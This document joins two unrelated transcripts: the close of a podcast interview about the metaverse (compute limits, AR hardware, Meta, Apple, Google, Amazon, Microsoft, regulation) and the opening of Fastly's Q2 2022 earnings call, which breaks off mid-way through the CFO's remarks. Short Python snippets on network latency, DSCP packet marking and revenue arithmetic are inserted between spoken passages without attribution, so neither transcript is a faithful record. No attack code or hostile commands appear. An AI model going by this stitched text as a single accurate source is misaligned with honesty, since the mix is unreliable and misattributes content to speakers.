One of the very hard problems with all of this is the amount of compute that is required. We are going to render a bunch of persistent virtual worlds that have unlimited maximum capacity, then potentially we are going to run blockchains to manage scarce digital goods inside those virtual worlds. That is a lot of compute; it is more compute than we have right now. Do you see that coming down because of Moore’s Law? Is TSMC going to figure out the next process node and we are just going to get there? Is it an agglomeration of other kinds of compute? Who builds this stuff? Where does it come from?

There are three dominant theories here. One is that Moore’s Law, slowing or not, continues to deliver improvements, and as part of that we get better at compression. We start to prune out the inelegant data formats and architectures, just like moving off of GIF to MP4 for lighter performance.

The second school is really organized around more efficient resourcing. This is the cloud argument. There are problems with it, but the argument would basically be that it is kind of stupid that we put the most intensive computing at the individual user, whose device has to be affordable, lightweight, and replaced every two to three years, versus the power plant approach of saying, “No one should have a generator in their home. We should deliver it at industrial scale.”

Then third are the bigger punts. There is a large contingent of people, at Intel or TSMC, who are starting to believe that quantum computing — another idea that has long been considered fanciful — is no longer a crazy thing to believe in and ends up being essential.

The last and the most fun is decentralized computing, not necessarily in the blockchain sense, but in the solar panel sense. I am sitting talking to you right now. I have two consoles with incredible GPUs both sitting unused. There may be someone in my building right now who could use that. Right now they either do not have it, or they need to rent it from a data center that is expensive and far away, thus producing latency. Could there be a model, on blockchain or not, that is a more effective system of renting out excess capacity, like a solar panel, or like Elon imagines Teslas will do as self-driving cars?
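Part of the appeal of a GPU down the hall versus a distant data center is simple physics. A back-of-the-envelope sketch, assuming signals in fiber propagate at roughly 200,000 km/s, about two-thirds the speed of light in a vacuum; real latency is higher once routing detours, queuing, and processing are added:

    # Lower bound on network round-trip time imposed by distance alone.
    def min_round_trip_ms(distance_km, fiber_speed_km_per_s=200_000.0):
        return 2 * distance_km / fiber_speed_km_per_s * 1000

    print(f"{min_round_trip_ms(1_500):.0f} ms")  # ~15 ms floor to a region 1,500 km away
    print(f"{min_round_trip_ms(5):.2f} ms")      # ~0.05 ms to a GPU in the same building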

I love that idea and have heard variations of it for a decade now. I used to run SETI@home on the computers at the college computer lab that I managed.

It is in my book. It is so fun.

It’s all right there. We have been chasing it for a minute. That requires that your personal power bill might go up and down in ways that you cannot predict. Your bandwidth might get strained in a way that you cannot predict. It would be sad if right now our call was diminished in quality because someone was running the GPU in your PS5 at 100 percent.

On top of that, at least in this country, the bandwidth required to do that is actually not evenly or equitably distributed. Some people have really fast connections, and many people have bad connections. There is virtually no competition for those connections whatsoever. You can make that bet, but you think about how it would play out in practice and it just feels like a lot of people will be selfish, first of all. That seems like a thing you can count on. Then second, the infrastructure to actually pull that off does not really exist.

I agree with you. I characterize it as the fun one because it remains the elusive one, just like when we talk about peer-to-peer servers for multiplayer games. It is a fun idea, but no one has figured out how to do it.

There are some technical solutions, of course, one of which could be that you do not necessarily need to congest the neighborhood if you geographically constrain who your GPUs are available to. You can also have different bidding. One of the problems I talk about in the book is the fact that we actually have very poor systems in TCP/IP to manage the prioritization of traffic once it leaves our network. I am not talking about paid peering or net neutrality, but literally the ability to differentiate whether it needs to be there in 10 milliseconds or 50 milliseconds.
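For what it is worth, IP does carry a Differentiated Services field intended for exactly this kind of marking; the gap being described is that networks you do not control routinely ignore or strip it. A minimal sketch of setting the marking on a socket follows; the constants are standard on Linux and macOS, but whether the mark survives beyond your own network is another matter entirely.

    # Mark a socket's traffic as low-latency via the IP TOS/DSCP byte.
    # 0xB8 is the DSCP "Expedited Forwarding" class shifted into position.
    # Routers outside your own network commonly ignore or rewrite this value.
    import socket

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_TOS, 0xB8)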

These are actually more fundamental issues. We do not have an effective way to split GPUs. It is not like you can say, “I need 80 percent of it but the remaining 20 percent can go.” I will say that there are some systems for this that are being deployed. J.J. Abrams and Ari Emanuel are on the board of a company called Otoy. They have a blockchain-based system called the Render Network, and it is designed to do exactly that.

An architectural firm that perhaps does not need its high-end GPUs overnight can rent those out on a bid-ask, blockchain-based system, and Hollywood studios do use them. This is not the expectation of every single person’s idle devices being used minute to minute, but we are starting to see it work on a more regular basis for industrial use cases with high-end, low-supply hardware. I put this in the “if you woke up in 2045, it might be answered” bucket.

Let’s wrap up here by talking about the companies that are building this stuff now and where they are. You run an ETF called Meta that invests in various metaverse companies, and you obviously pay very close attention. Let’s start with the obvious candidate here, Meta.

In your book, you call it Facebook, because it is too confusing to call Meta “Meta” in a book with a metaverse, which I appreciate. Facebook obviously rebranded itself to Meta, Zuckerberg is all in on this pivot to the metaverse. In VR headsets at least, they are the market leader; the Quest 2 is a really good consumer product. Though I do not know if it is a metaverse product, since it is a pretty closed system. But they are ahead. How do you think they are doing and where do you think they go next?

I would say that the Oculus device is actually pretty open. They support side loading, and they do not require a central identity system. You can use alternative payment solutions for side-loaded apps, which is not even side loading, it is just not app store direct. The Oculus is unique in that it is effectively the only mainstream console that uses open-standard rendering APIs: WebGL, OpenGL, WebXR. Those are pretty significant. No one else did it. PlayStation 3 did, but PlayStation has never done it since.

The truth is, if you were to talk about number of users, amount of spend, number of developers, amount of developer profits, and cultural impact, they are frankly nowhere near leaders like Roblox, Fortnite, Minecraft, or Unity on the B2B side. They also have a much harder path to doing that.

One of the challenges Facebook has in particular is that the economy is slowing down. Apple’s ad changes have had huge effects on Facebook’s revenue. They are trying to manage this big pivot and this bet on the future. People might buy fewer Quest consoles, and they are investing less in future hardware. Do you think they are going to be able to make it through?

The App Tracking Transparency shift from Apple is particularly brutal. The estimated cost of that is $10 billion in operating cash flow in 2022. That happens to be exactly what Facebook Reality Labs was spending on their many projects, the various XR devices, the wearables, their operating system, and the Horizon Worlds platform. Anyone finding out that they are going to have $10 billion less in cash flow is going to have to trim budgets, especially in special projects with limited revenue and probably a negative 80 percent gross margin overall.

I think the biggest challenge — one that Mark has consistently underestimated, it seems — is that the timeline for those new devices, that would allow him to get out from the hegemony of Apple and Google, is probably farther out than was ever imagined.

2015 was the first time Mark said publicly that they imagined by the end of the decade, last decade, wearable headsets would replace the smartphone. They have reiterated that this decade, but as you and your colleagues have reported, they have now delayed the first edition three times. We may not see consumer AR hardware until 2025 or 2026, and he has called it the hardest technological challenge of our era, putting a supercomputer into lightweight wearables.

If that is their biggest opportunity to have hardware, to have their own operating system, and they are already sitting behind when it comes to what I call integrated virtual world platforms — Horizon versus Roblox or Fortnite Creative Mode — and they are simultaneously experiencing decline, not necessarily secular, of the core business, the timing starts to feel tight.

You said that it is the hardest technological challenge. I always think about it as a stack of problems, especially for AR glasses. You need a camera that can see the world around you in sufficient fidelity. That has to go to a processor that can interpret that data and spit out something good to put over top of it to augment reality. You need a battery that can power that processor and that camera. You almost certainly need persistent connectivity. Then most importantly, you need a display solution that actually works, which does not exist yet. Do you think Facebook is on the road to solving any or all of those problems?

I would add two more problems. It has to actually fit and weigh little enough that you are comfortable wearing it, and it has to not melt your face while you do it. Every single thing that you just mentioned trades off with one another. If you want another two sensors that are good for UX, that drains the battery and the GPU, increasing the cost and the form factor and generating more heat.

Put another way, we take for granted that today’s most computationally powerful consumer devices, consoles, really just need to manage for a few constraints. The size, not really; the new PlayStations are four times bigger than the first PlayStation. They do not need to manage the battery, as they have constant access to power. They can put fans in there so that the overheating problem is not that bad. And they know that the bill of materials has to cost between $400 and $700. When you are talking about these devices, you have several new problems: size, heat, you cannot have a fan, you need battery power, and the GPUs are smaller. All of the other things get harder despite that.

We see that Facebook is investing in its own semis and you are right, it’s the stack. All of these things need to be solved. We know that Apple is planning up to 12 or 14 cameras. I think the current Oculus has 6. Well, maybe you do need 12 or 14. Every time you put another pair in there, you are going to find that the GPU you thought was going to power experience X just cannot. It is incredibly hard.

I think that set of challenges is very difficult for Facebook. When we talk about hardware, we have to go to Apple next, which is very good at hardware. They are very good at performance chips that run a long time on batteries. There are lots of rumors about Apple’s headset out there.

But they are pretty bad at ecosystems and playing nice with others, and with interoperability. As you have mentioned with their ad tracking stuff, they are pretty good at locking things down. They are good at preventing innovation from taking place; game streaming does not exist the way it could because Apple will not allow it on their platforms. OpenSea cannot transact NFTs because they would have to pay Apple a 30 percent cut. How do you think Apple is doing?

One thing that is fun to put on the side of this is that six days before Epic Games sued Apple, Tim Sweeney, the founder and CEO, tweeted out that Apple had outlawed the metaverse. His point was exactly the cloud gaming one. I cite The Verge a few times in there with these fun quotes that basically say, “Arguing about what Apple does or does not allow is irrelevant because they can change the rules any time they want.”

The Apple constraint here is really profound. They have incredible hard, soft, and often accidental power, and they do work hard to prevent many standards and solutions coming into place.

You just teed up my favorite example, which is what happens with NFTs. Let’s keep in mind that they allow you to buy fungible tokens, ETH, on Coinbase, but you cannot buy a non-fungible token, an NFT, on Coinbase. If you choose to fractionalize an NFT into a billion fungible tokens — you could actually increase it so that there are more fractionalized tokens than there are Bitcoin tokens — that is still not allowed, even though you might own one trillionth of an NFT.

This just reflects the extent to which they are contending with not just business model disruption, but control of their own ecosystem. Outlawing is not the wrong word, but I think we will see how that turns out. When it comes to new hardware, it is obvious. If AR and VR are going to be things, Apple will be at least a player, but it is more likely that they will have the most performant, best-looking, lightest weight, and preferred early editions. The advantages there, especially at scale and cost — development cost or production cost — are simple.

In the book you have a section about how the metaverse need not actually take place in headsets. It could be expressed in all kinds of ways. As we talk about these companies, their metaverse bets are very much headsets.

Facebook wants to be first to headsets at scale, because then they can just leave the iPhone and the complications of Apple’s platform behind. Apple does not want to have the iPhone disrupted, so they are racing towards a headset. I think Tim Cook wants to ship the AR headset as his last big reveal before he moves on in 10 years. Right now, to do a non-headset metaverse, you are kind of stuck behind whatever Apple will allow, because they are the most pervasive computing platform that exists.

That is quite right.

Is there a way around that? Do we just hope Amy Klobuchar can find the votes for her antitrust bill, or is there a business model or industry solution that solves that?

This is where we get into some of the interesting answers. Is there a way around it? Are there alternatives? Yes and no.

Cloud gaming is a potential answer, but we should keep in mind exactly how many ways Apple stymies them. It probably works 95 percent of the time for 40 percent of users. That is not a good technical solution for a social platform, but it can work. Doing it from the browser is not a great experience. Apple, for security reasons, valid and not valid, also constrains your ability to send notifications. That is not great if I am trying to tell you to log onto Fortnite. First of all, you cannot have an app, and secondly, you don’t ever get the notification.

The other way to do it is browser-based rendering, but Apple has historically constrained WebGL, so the non-application alternative of using a browser, what they call the open web, doesn’t really work. Apple constrains WebGL because Safari does not support it comprehensively, and while I can download Chrome for iOS, I am really just using a Chrome wrapper on the Safari engine. Their technical decisions for Safari mean that what Google can and cannot do is inherited, and the App Store’s hegemony over software means that I cannot download true Chrome.

This gets at why Tim sued Apple. He says that Apple has outlawed the metaverse rather than gotten in its way. A properly motivated Apple can effectively stymie most things. There is a reason why Web3 games are either based on non-real-time collecting and trading, or really primitive browser-based games; visually, Axie Infinity is a good example. You cannot pull off complex rendering without most of WebGL or a native app, and Apple will not allow it.

You mention the open web, which means we should talk about Google next. Google is Google. They have multiple competing projects. They have just restructured some things, and they have announced some little things. Are they a player?

That is a great question. Google has spent quite some time focused here. Google Glass was a famous disaster, but they have released another two versions of Google Glass, or enterprise editions. They made a billion-dollar acquisition last year and a $200 million acquisition the year before. Clay Bavor, an SVP who has been in charge of essentially all special projects, plus AR and VR, for some years, was realigned to report directly to Sundar.

It is clear that they are focused here. The problems have always been that their software is never considered best for consumer applications, their hardware has never really taken off, and their efforts in gaming have barely been funded. Many of their best potential plays, Niantic and others, were divested, spun off, or ceded to competitors.

If Android is and remains the most used ecosystem globally — it is the second highest revenue-generating games platform globally — they are likely to benefit, but the big opportunities with new hardware, a virtual world platform, or managing the standards, all seem tough. Even when you take a look at Google Cloud, it is estimated to be losing $5 or $6 billion per year. AWS has more profit than Google Cloud does in revenue. Even with the tangential argument that increased computing power is going to be good for Google, their business currently loses money every time a new server gets stood up. They are harder to see.

You mentioned AWS, so let’s keep going down the list. Amazon has some pretensions here, in the sense that they have a big hardware division that invents a bunch of stuff all the time. They have the most pervasive voice assistant, which I think is an interesting sidelight on the idea of a secondary world that you can interact with in different ways. Are they a player? Do you see them making an investment?

I would guess that they are number one in virtual assistant hardware, but I would also guess that Siri and Google Assistant are the most-used virtual assistants. Those have the benefit of living on the device you carry everywhere; mobile is better tailored.

Amazon is really interesting. The computing and data center business is going to be an extraordinary beneficiary. How much that moves into value-added services in machine learning and others has yet to be known. Snowflake is a good example of other companies building value-added services on top of the pure racks.

The bigger challenge is one I find really interesting. Amazon has spent a lot of time focused on more traditional media categories than it has on gaming or interactive, even though the latter seems a lot closer to their core business on the AWS side, and their success rate has been mixed. Jason Schreier at Bloomberg has estimated billions were spent on Lumberyard, their game engine. That was given over to the Linux Foundation earlier this year. Luna, their cloud gaming service, seems to have had less of an impact than Google Stadia did.

That is a very quiet burn. I just want to put that out there.

There is a good question of whether or not it is a quiet burn because they have been a lot quieter as well. Part of the problem that doomed Stadia was much bigger and more public ambitions, and much greater out-of-the-gate spend. Amazon is best in the world at the slow burn strategy and they remain committed to it, though I have not seen any big leaps.

While Amazon Game Studios has had some success with New World and others more recently, it is operating as the publisher. They are not developing the titles themselves, and they are not using AWS in an innovative or new way. As you take a look at Amazon’s interactive business, they have rewritten many job descriptions to focus on the metaverse in name. They are a big proponent of the Unreal ecosystem. They are trying to advance certain standards. But externally a lot of it still feels like more potential and conjecture than it is, as yet, a product.

I want to ask about two more here. Microsoft CEO Satya Nadella has said the metaverse is already here, so he is buying Activision and the Xbox seems to be growing. They just keep buying everything, but they do not have great hardware. The HoloLens is not a huge success; they just shuffled that team and fired Alex Kipman, who was in charge of the HoloLens. Are they on track, or are they just going to be a horizontal software provider, which has been an enormously successful strategy for them as you pointed out?

I talk about this quite a bit in the book. There is this fascinating aspect in which the company has absolutely thrived under Satya by becoming horizontal, shedding the stack requirement and rich vertical integration.

But when Satya took over, the games business was being called on for divestment. Yet the first acquisition he did was of Minecraft. He did something really unique at the time; he committed to keeping it fully horizontal, available on all platforms, not exclusive to Xbox, and keeping it agnostic to the end point, not even preferring Xbox hardware.

It was about five or six years before he did another large acquisition, that of LinkedIn. Then you have Activision Blizzard, the most expensive big-tech acquisition in history, at $75 billion. In the opening paragraph of the announcement, the last line, he says, “It is for the foundations of the metaverse.”

In many ways, Minecraft presaged everything that he was going to do with the strategy at large, and they have been very focused here. The number of different pieces they have is actually really exciting. I talk about Microsoft Flight Simulator as perhaps the most technically impressive consumer-deployed, persistent live digital twin or metaverse-style experience that any of us can do.

This is a company where, putting aside the fact they were public about the metaverse before Facebook was, it feels like execution of bringing the pieces together — which is the same for Google and Amazon, but less clear — could be extraordinary for them. I think that is why you have always seen this commitment, and why he is so quick to bet FTC scrutiny, DOJ scrutiny, and $75 billion to build it.

I could keep doing companies forever. It’s a fun game, but I want to actually end on the regulatory scrutiny piece.

This space is unregulated, in a way that if you make the comparison to the early internet, it is very different. The early internet was a government project. There was the idea that we would keep regulators away from it. Even that decision to keep regulators away is, itself, a regulatory decision, and then you had all of the public investment into the internet around the world.

That is not happening here, right? This is all a purely private company kind of investment. Regulators seem like they have no idea what to do here, in the same way that even regulators have no idea what to do with crypto, but they have a lot of ideas. Here it is just silence. Where do you think that comes into play? Where do you think the government comes into play here with the metaverse?

The interesting thing about regulators leaving their hands off the internet is, of course, that the internet came from government. Many of its foundational bodies, such as the Internet Engineering Task Force that stewards most of TCP/IP, were developed by the DOD and then relinquished, but are still strongly influenced by government. One of the reasons why governments left it alone was that there were pretty strong and important self-regulating bodies, which they had helped to create, that worked together effectively.

You are right that we do not see this here, but I actually think it is changing pretty quickly. Yesterday the EU released its think tank’s policy memorandum. The chief negotiator of the EU for the Digital Services Act has been very critical and very vocal about what they need. The South Korean government has established the South Korean Metaverse Alliance, an effectively required body that is also mandating national standards.

Their perspective seems to be that the standards group will force things that many members do not want and are individually disadvantaged by, but to the national benefit. Of course in China, which is a whole other issue, I do not think it is a coincidence that just after Tencent unveiled its Hyper Digital Reality vision — which is essentially their trademark for the metaverse — they began the biggest ever crackdown on the space.

I think the US is probably the furthest behind, in at least formal recommendations. I think that in many territories — Southeast Asia, China, and the EU — governments seem very focused on this now in a way that surprises and inspires me. The fact that it coincides with regulation designed to fix the problems of the past 15 years raises the specter of accidental damage to an area that does not really exist yet. I am more hopeful that it actually sets us on a clearer path, rather than 15 years of catch-up.

Let’s end with a look to the future. I think one of the things that you and I would both agree on is that this is not going to be a light switch. The metaverse is not going to just turn on one day; it is going to happen to us slowly over time. I am curious. In that big picture, what is the signpost for you that the metaverse is more likely than not, or that it has arrived in a real way? What would be the indicator for you?

The indicator that I would pay attention to is the early demographic transition. Seventy-five percent of those ages 9 to 12 in most Western markets use Roblox, and just Roblox, on a regular basis. That is not to say that they do not use other things. We know fundamentally that Gen Y games more than Gen X, Gen Z more than Gen Y, and Gen A more than Gen Z, and that trend is not turning around.

I think the big things that I am getting excited about are the industrial applications, the deployment in what we call ACE — architecture, construction, and engineering. The challenge with those is that lead times are long. You have to convince businesses to use new technology to solve problems they are not used to solving. They have to then deploy them, and they have to get good at using them. They need to start to share with the city and with other partners.

Once we actually find a way to make development of the real world more productive, to live-operate businesses and infrastructure together — which can be as simple as lighting systems in a smart city with proper civil engineering — that is what gets exciting to me.

Matt, this has been incredible. I could keep going for another hour. Thank you so much for being on Decoder.

Thank you.

Fastly, Inc. (FSLY) CEO Joshua Bixby on Q2 2022 Results - Earnings Call Transcript

Fastly, Inc. (NYSE:FSLY) Q2 2022 Earnings Conference Call August 3, 2022 5:00 PM ET

Company Participants

Vernon Essi - Investor Relations

David Hornik - Lead Independent Director

Joshua Bixby - Chief Executive Officer

Ron Kisling - Chief Financial Officer

Conference Call Participants

Frank Louthan - Raymond James

Rudy Kessinger - D.A. Davidson

Quinton Gabrielli - Piper Sandler

Charlie Erlikh - Baird

Philip Rigby - RBC Capital Markets

Tom Blakey - KeyBanc

Operator

Ladies and gentlemen, thank you for standing by. At this time, I would like to welcome everyone to the Fastly Second Quarter 2022 Earnings Conference Call. [Operator Instructions] Thank you. I would now like to turn the conference over to Vernon Essi, Investor Relations at Fastly. Please go ahead.

Vernon Essi

Thank you and welcome, everyone, to our second quarter 2022 earnings conference call. We have Fastly’s Lead Independent Director, David Hornik; our CEO, Joshua Bixby; and our CFO, Ron Kisling, with us today. A webcast of this call can be accessed through our website, fastly.com, and will be archived for one year. Also, a replay will be available by dialing 800-770-2030 and referencing conference ID number 754-3239 shortly after the conclusion of today’s call. A copy of today’s earnings press release, related financial tables and investor supplement, all of which are furnished in our 8-K filing today, can be found in the Investor Relations portion of Fastly’s website.

During this call, we will make forward-looking statements, including statements related to the expected performance of our business, future financial results, strategy, long-term growth and overall future prospects. These statements are subject to known and unknown risks, uncertainties and assumptions that could cause actual results to differ materially from those projected or implied during the call. For further information regarding risk factors for our business, please refer to our most recent quarterly report on Form 10-Q filed with the SEC and our second quarter 2022 earnings release and supplement for a discussion of the factors that could cause our results to differ. Please refer in particular to the sections entitled Risk Factors. We encourage you to read these documents.

Also note that the forward-looking statements on this call are based on information available to us as of today’s date. We undertake no obligation to update any forward-looking statements, except as required by law. Also during this call, we will discuss certain non-GAAP financial measures. Unless otherwise noted, all numbers we discuss today other than revenue will be on an adjusted non-GAAP basis. Reconciliations to the most directly comparable GAAP financial measures are provided in the earnings release and supplement on our Investor Relations website. These non-GAAP measures are not intended to be a substitute for our GAAP results.

Before we begin our prepared comments, please note that we will be attending two conferences in the third quarter, the KeyBanc Technology Leadership Forum in Colorado on August 9 and Citi’s 2022 Global Technology Conference in New York on September 7.

With that, I will turn the call over to David for his comments regarding today’s announcement of our new CEO, Todd Nightingale. David?

David Hornik

Thanks, Vern. Hi, everyone and thank you for joining us today. As you may have seen from the press release we issued this afternoon, I am thrilled to share that after a broad and extensive search to identify the company’s next leader, Todd Nightingale has been appointed the next Chief Executive Officer of Fastly. Fastly’s large enterprise customer base, robust product roadmap and unrivaled customer satisfaction give us confidence about Fastly’s future and the significant opportunities ahead. As we searched for the company’s next leader, the Board was committed to finding a candidate who could help build upon Fastly’s strong foundation and lead it into the next stage of growth.

The Board is confident that Todd’s customer-oriented leadership style and extensive background helping customers transform their infrastructure and digitize their businesses will greatly benefit Fastly and position the company for future success. Hailing from Cisco, where he currently serves as Executive Vice President and General Manager of Enterprise Networking and Cloud, Todd is a proven and passionate technology leader. Todd understands that now more than ever, enterprises need innovative solutions that enable them to deliver globally performing, secure and reliable applications to their customers. He will officially join us as CEO on September 1 and Joshua will remain with the company for a period of time to ensure a smooth and successful transition.

Please note that at this time, we won’t be addressing any questions regarding Todd’s appointment during today’s Q&A, but we plan to share more information once he’s started.

With that, I’ll turn the call over to Joshua.

Joshua Bixby

Thank you, David. Hi, everyone and thanks for joining us today. Today, I will talk about the quarter and then we will invite Ron to provide some more color on this quarter’s results. Then we will take some questions, which, as David indicated, we ask that you focus on the results and the outlook.

In the second quarter 2022, we reported revenue of $102.5 million, representing flat sequential growth and 21% growth year-over-year. These results exceeded the top end of our guidance range of $99 million to $102 million and represent another record revenue quarter. Our customer retention and growth engine remains strong. Our LTM NRR was 117%, and our DBNER was 120% in the second quarter. Our average enterprise customer spend was $730,000, representing a 1% quarter-over-quarter increase.

Our total customer count in the second quarter was 2,894, of which 471 were enterprise customers. Our total customer count increased by 14 in Q2, down from 76 in Q1. This was driven by higher churn at the low end of our customer base, which we believe reflects the uncertain macro environment affecting smaller customers, as well as the dynamics we have described before, in which small customers opt for our more robust developer-friendly trials.

We continue to focus on landing new enterprise and large customers. For example, in the second quarter, the average monthly revenue run rate of the new customers we added to the platform was 85% higher than that of those that churned. In terms of developer traction, we added over 100,000 developers to our platform across Glitch and our Compute@Edge platform, and we are pleased to see so many new developers experimenting with us. It is encouraging to see our enterprise customer count increase by 14, compared to 12 in the first quarter. This increase in enterprise customers validates our efforts in sales and marketing to retain and expand our customers’ revenue, particularly with larger customers. This was the case with two Fortune 500 customers: one, a leading CRM company with world-class enterprise customers, and the other, a global digital payments juggernaut. Both customers expanded their use of Fastly across multiple product lines in the second quarter.

You may have seen the announcement last week that Fastly is now an official global sponsor of the Mercedes AMG Petronas Formula One team. This long-term partnership reflects our shared commitment to experiences that are fast, safe and leading edge, both on the track and on the Internet. You will be hearing more about this growing relationship on the track and on our platform in the coming quarters.

As we discussed in detail last quarter, one of the key initiatives we have undertaken in 2022 is the deployment of our new architecture for key metro regions. As previously discussed, we believe we will achieve material gross margin leverage by doubling down on server efficiency with this new architecture, which is coupled with our proprietary software development. As discussed previously, we have been running duplicate sites, which is a gross margin headwind. However, our gross margin in the second quarter was further adversely impacted primarily by onetime cost true-ups and other smaller items. Ron will provide more details in his section, as well as on our strategic initiatives aimed at reducing supply chain risks and carrying costs on our infrastructure CapEx. Our gross margin declines are an area of focus, and we remain committed to taking the necessary steps to see this improve. Like last quarter, the pricing dynamics in the business have not materially changed and have not been a major contributor to our recent decline.

The team at Fastly remains united in our common mission, which is to fuel the next modern digital experience by providing developers with a programmable, secure and reliable edge cloud network that they adopt as their own. Central to this common mission is the key role developers play in our journey and the new and expanding power of distributed edge compute and security. As they use our trusted platform, they become more interested in its features and that keeps them engaged and retained as customers as they scale.

To reinforce this effort, we acquired Glitch, announced on the heels of our Q1 results, a platform of 1.8 million developers, bringing together two of the world’s best ecosystems for application development into a single seamless developer experience to deliver globally performant, secure and reliable applications at scale. Now developers can innovate, create and share full stack web apps without having to run the infrastructure or manage tools themselves. We are very excited about Glitch as it provides a giant leap forward in our developer relations efforts.

We are also building partner momentum to broaden and deepen our developer reach. As you may have seen last week, we announced a reseller partnership with HUMAN to resell their industry-leading bot detection to help security and fraud teams keep cybercriminals out of their online applications and services. Using superior detection methods, hacker intelligence and collective protection across the web, HUMAN detects and defeats bot attacks and fraud with unmatched scale, speed and precision. Now customers can get all the benefits of Fastly’s next-gen WAF, the first and only unified WAF solution, together with HUMAN’s exceptional bot protection and management capabilities. In the coming quarters, we will continue to expand our roster of partners to expand the scope and reach of our platform.

Moving on to our product highlights for the second quarter. Our delivery products, which are part of our network services portfolio, continued to receive strong market validation. Fastly was recognized as a Customers’ Choice in the 2022 Gartner Peer Insights Voice of the Customer report for Global CDN. Fastly received the highest customer rating of 4.8 out of 5 stars and the highest customer willingness to recommend at 97%. We earned this recognition due to our network size and scale, developer focus, web security and customer support. Positive customer sentiment continues to lead to significant up-sells with our largest customers. For example, in the second quarter, a leading social media platform with over 50 million daily active users chose to expand our relationship with additional products after undertaking a competitive RFP process.

We continue to accelerate Fastly’s product delivery. In the second quarter, we had 14 releases in total compared to 11 releases in the first quarter. Observability has been a top priority in 2022, and we announced general availability of both Origin Inspector and Domain Inspector, both of which can be self-enabled straight from the Fastly UI. For companies using a single origin, multi-cloud or multi-CDN architecture, Origin Inspector unlocks end-to-end visibility of Internet traffic traveling from the origin to the Fastly edge cloud. Domain Inspector allows our customers to effortlessly monitor traffic for a single fully qualified domain name or multiple domains assigned to a Fastly service.

On the security front, we had several new developments. Fastly’s next-gen WAF edge deployment is now in general availability. Given the rise of new threats in late 2021 and into early 2022, such as Log4j and Spring4Shell, we added new APIs for deprovisioning, improved origin syncing and now support a percentage ramp-up feature to control the amount of traffic through the edge security service. Our delivery customers are easily migrating to our expanded security offering. In the second quarter, an online discovery platform serving over 300 billion content recommendations monthly extended its Fastly edge delivery needs with the Next-Gen WAF product.

Along with Fastly’s next-gen WAF, we added CVE signals, allowing virtual patching functionality to be configured through a web interface. We introduced Fastly Security Labs, a new program that empowers customers to be the first to test new detection and security features and to provide feedback directly to the security product team, bolstering the quality of our Next-Gen WAF. We also added features to our Image Optimizer, and we added a JavaScript SDK to Compute@Edge’s supported languages. Compute@Edge continues to be critical in winning new business. For example, a Japanese e-commerce marketplace chose Fastly specifically because of our JavaScript support in a competitive deal for Compute@Edge that did not include delivery. Our continued strong execution on the product and engineering front is very exciting, and our significant increase in release velocity reinforces our commitment to developers and platform builders.

Underpinning all of our technology is our lightning fast network. We continue to remain consistently faster than our peers in the U.S. and Europe, even surpassing some of our toughest critics and customers’ expectations. This performance advantage validates our unique architecture, and we are continuing to invest in this development to fuel growth. Performance paired with security is one of the most critical decision-making metrics for our customers. That is why we are excited and proud to be part of Apple’s new iCloud private relay service that’s designed to protect users’ privacy on the Internet. And we’re also collaborating with Apple, Google and others to develop and standardize the technology behind private access tokens to provide secure anonymity to end users.

I will close out by saying that working closely with world class customers like Apple is further validation of Fastly’s technology and platform solution, and we look forward to further opportunities to collaborate with industry leaders.

To discuss the financial details of the quarter and guidance, I now turn the call over to Ron. Ron?

Ron Kisling

Thank you, Joshua and thanks everyone for joining us. Today, I will discuss our business metrics and financial results and then review our forward guidance. Note that unless otherwise stated, all financial results in my discussion are non-GAAP-based metrics.

Total revenue for the second quarter increased 21% year-over-year to $102.5 million, exceeding the top end of our guidance of $99 million to $102 million. In the second quarter, revenue from Signal Sciences products was 13% of revenue, a 56% year-over-year increase or 41% increase after purchase price adjustments related to deferred revenue are reflected.

While we are not immune to the macroeconomic trends, we are seeing healthy traffic expansion from our enterprise customers, and given our relatively smaller market share, we are benefiting from share gains in an otherwise challenging environment. Our dollar-based net expansion rate, or DBNER, was 120%, up slightly from 118% in Q1, and our trailing 12-month net retention rate was 117%, up slightly from 115% in the prior quarter. We continue to experience very low churn of less than 1%, and our customer retention dynamics remain strong.

As Joshua stated, we had 2,894 customers at the end of Q2, of which 471 were classified as enterprise, those customers with in excess of $100,000 of revenue over the previous 12 months. Enterprise customers accounted for 88% of total revenue on a trailing 12-month basis, down slightly from their 89% contribution in Q1, and increased their average spend to $730,000 from $722,000 in the previous quarter, demonstrating our continued ability to expand our business within our largest customers and our strong customer retention. Our top 10 customers comprised 34% of our total revenues in the second quarter of 2022, in line with their contribution in the first quarter of 2022.
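For readers reconciling these figures, the arithmetic below backs an implied trailing-12-month revenue figure out of the numbers just quoted. This is a rough illustrative check in Python, not a company disclosure; it assumes the average spend and the 88% share are measured over the same trailing-12-month window, and all inputs are rounded.

# Back-of-the-envelope check on the reported enterprise metrics.
# Assumption: average spend and the 88% share refer to the same
# trailing-12-month (TTM) window; all inputs are rounded figures.
enterprise_customers = 471
avg_enterprise_spend = 730_000            # dollars, TTM
enterprise_share_of_revenue = 0.88        # share of TTM revenue

enterprise_ttm_revenue = enterprise_customers * avg_enterprise_spend
implied_total_ttm_revenue = enterprise_ttm_revenue / enterprise_share_of_revenue

print(f"Enterprise TTM revenue: ${enterprise_ttm_revenue / 1e6:.1f}M")        # ~$343.8M
print(f"Implied total TTM revenue: ${implied_total_ttm_revenue / 1e6:.1f}M")  # ~$390.7M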

Before I begin a detailed discussion of our financial performance, let me step back and take a moment to discuss the changes taking place within Fastly’s financial organization. As we have discussed, since I joined Fastly 1 year ago, we have been in the process of transforming our financial team, our operations and the management of our balance sheet. This has resulted in several changes that we believe will not only strengthen Fastly’s financial position longer term but also improve Fastly’s competitive positioning and its transparency to the investor community.

Let me briefly discuss these improvements. First, we used our strong cash balance to repurchase approximately $235 million of the principal amount of our convertible debt at a 25% discount to its principal value, resulting in a $54 million gain on this repurchase. Secondly, we made advanced payments for capital hardware of $29.3 million to suppliers on purchase commitments we had made in early 2021 to reduce our exposure to supply chain constraints. These advanced payments will reduce carrying costs by over $1 million over the next 12 months, depending on our deployment schedule for the committed equipment. Third, we have improved our capacity planning process with better forecasting and cross-functional reviews to better align capacity investments with expected traffic levels. We believe this will result in improved gross margins in the medium to long term. In addition, we now expect our cash CapEx for 2022, which includes purchases of PP&E and capitalized internal use software and excludes advanced payments for PP&E and repayments of finance leases, to decline to a range of 10% to 12% from our previously expected range of 12% to 14%.

